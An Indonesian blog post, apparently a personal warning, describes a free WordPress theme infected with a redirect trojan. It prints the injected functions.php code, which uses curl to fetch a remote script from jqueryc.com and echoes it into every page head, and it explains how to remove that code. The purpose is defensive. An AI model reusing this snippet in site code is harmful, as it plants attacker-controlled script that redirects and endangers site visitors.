Web Design

product 1

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque nec dictum tortor.

More

Multimedia

product 1

Proin eleifend quam eu purus aliquet scelerisque. Sed non nibh a urna tristique vestibulum.

More

Customizations

product 1

Morbi suscipit, nisl eget porttitor hendrerit, arcu sapien cursus enim, id luctus felis metus urna.

More

Terinfeksi HTML:RedirME-inf[Trj]

yo2k | 1:04 AM | 0 comments

Ini adalah pengalaman yang sangat menjengkelkan, pasang theme wordpress setelah 1 bulan kena trojan. Saat di buka di browser firefox terdeteksi torajan seperti gambar diatas. Kalo anti virus dimatikan, alamat web lari ke jqueryc.com Anda mungkin berpikir hosting kena virus ? Anehnya kalo theme dirubah ke theme standar bawaan wordpress web berjalan normal saja.

Setelah ditelusuri ternyata php pada theme yang saya pakai ada yang aneh..!

function.php

// load config   
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} require_once(dirname(__FILE__).'/config.php');


Perhatikan teks warna diatas, hal ini yang menyebabkan kalo web dibuka langsung direct ke jqueryc.com. Coba backup file php dan hapus teks merah diatas dan save. Setelah dibuka lagi web kembali normal.
Ternyata theme gratisan yang bertaburan di dunia maya phpnya banyak yang dimodif/injek.

Category:

Vk bhardwaj: Terima kasih telah berkujung di http://sentrall-blog.blogspot.com.

0 comments

Newer Post Older Post